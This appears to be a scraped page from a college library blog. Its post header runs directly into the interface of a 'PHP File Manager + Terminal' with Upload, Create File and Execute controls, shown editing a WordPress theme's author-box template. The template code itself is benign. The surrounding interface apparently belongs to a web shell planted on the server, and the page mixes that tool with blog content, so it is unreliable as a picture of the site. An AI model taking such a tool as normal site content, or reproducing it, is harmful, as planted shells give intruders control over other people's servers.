Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/library/wp-content/themes/coldbox/parts Upload Create File Create Folder Execute Editing: /var/www/html/library/wp-content/themes/coldbox/parts/author-box.php<?php /** * The template for displaying author meta box. * * @since 1.0.2 * @package Coldbox */ ?> <div class="author-box"> <div class="author-thumbnail"> <?php cd_get_avatar(); ?> </div> <div class="author-content"> <div class="author-infomation"> <p class="author-name"><?php the_author_meta( 'display_name' ); ?></p> <div class="author-links"> <?php if ( cd_is_links_on_author_box() ) : cd_social_links(); endif; ?> </div> </div> <p class="author-description"><?php the_author_meta( 'description' ); ?></p> </div> </div> Save